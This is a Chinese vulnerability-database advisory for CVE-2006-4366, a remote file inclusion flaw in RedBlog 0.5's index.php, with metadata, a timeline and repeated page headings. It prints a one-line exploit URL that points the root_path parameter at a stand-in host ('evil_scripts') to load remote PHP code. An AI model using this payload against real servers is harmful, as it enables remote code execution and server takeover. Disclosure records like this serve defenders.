RedBlog 0.5 Index.PHP Remote File Include Vulnerability

基本字段

漏洞编号：: SSV-81993

披露/发现时间：: 2006-08-26

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2006-4366

CNNVD-ID：: CNNVD-200608-422

CNVD-ID：: CNVD-2006-6556

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 0x153 共获得 0.15KB

RedBlog 0.5 Index.PHP 远程文件包含漏洞

漏洞类型：

输入验证错误

漏洞危害：

攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制服务器

exp：

http://www.example.com/[Path]/index.php?root_path==http://evil_scripts?

解决方案：

厂商没有提供补丁，推荐使用加速乐:)

共 2 兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 rage 共获得 1.4KB

登陆后兑换查看

共 7 兑换

参考链接

http://www.exploit-db.com/exploits/28423

解决方案

临时解决方案

无

官方解决方案

升级到最新无漏洞版本

防护方案

无

匿名兑换漏洞详情
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
@mb1Dex 兑换漏洞详情
匿名兑换PoC
0x153 兑换PoC

生命线

2006-08-26 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

基本字段

来源

漏洞详情

RedBlog 0.5 Index.PHP 远程文件包含漏洞

漏洞类型：

漏洞危害：

exp：

解决方案：

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

基本字段

来源

漏洞详情

RedBlog 0.5 Index.PHP 远程文件包含漏洞

漏洞类型：

漏洞危害：

exp：

解决方案：

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定